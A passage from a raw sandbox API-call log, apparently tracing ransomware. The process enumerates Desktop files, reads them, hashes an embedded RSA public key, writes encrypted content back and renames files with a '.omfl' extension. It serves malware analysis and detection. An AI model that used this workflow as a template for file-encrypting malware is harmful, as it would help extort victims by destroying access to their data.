lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.314] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.314] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.314] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.314] CloseHandle (hObject=0x5c8) returned 1 [0130.317] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.317] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0x7516fe8 [0130.317] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.317] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8oQepxUnCyEAzbeX.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8oqepxuncyeazbex.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8oQepxUnCyEAzbeX.ods.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8oqepxuncyeazbex.ods.omfl")) returned 1 [0130.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.318] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.318] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.319] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.319] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x238aaa00, ftCreationTime.dwHighDateTime=0x1d5e2ac, ftLastAccessTime.dwLowDateTime=0x9a361350, ftLastAccessTime.dwHighDateTime=0x1d5e776, ftLastWriteTime.dwLowDateTime=0x9a361350, ftLastWriteTime.dwHighDateTime=0x1d5e776, nFileSizeHigh=0x0, nFileSizeLow=0x73ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8TIQU.rtf", cAlternateFileName="")) returned 1 [0130.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.320] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.320] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.320] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TIQU.rtf") returned=".rtf" [0130.320] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8TIQU.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8tiqu.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.320] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=29679) returned 1 [0130.320] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.323] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x73c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.323] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.324] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.324] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.324] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.324] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x73ef, lpOverlapped=0x0) returned 1 [0130.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.324] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.324] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.325] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.326] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.326] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.326] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.326] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.326] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.326] GetLastError () returned 0x0 [0130.326] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.326] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.326] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.326] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.326] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.326] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.326] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.326] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.326] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.326] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x73f0) returned 0xdd2c688 [0130.326] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2c50 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ae8 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2c98 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b00 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b30 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b48 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.327] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b48 | out: hHeap=0x4970000) returned 1 [0130.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.327] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b48 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16b30 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.327] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b48 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.328] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.328] GetCurrentThreadId () returned 0x618 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5740 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.328] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.329] GetCurrentThreadId () returned 0x618 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b30 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.329] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.329] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b48 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b18 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b60 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b30 [0130.330] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.330] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.331] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.331] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.331] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.331] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b30 | out: hHeap=0x4970000) returned 1 [0130.331] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.331] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.331] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b60 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b48 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b18 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b00 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2c98 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.332] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.332] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x73ea, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, 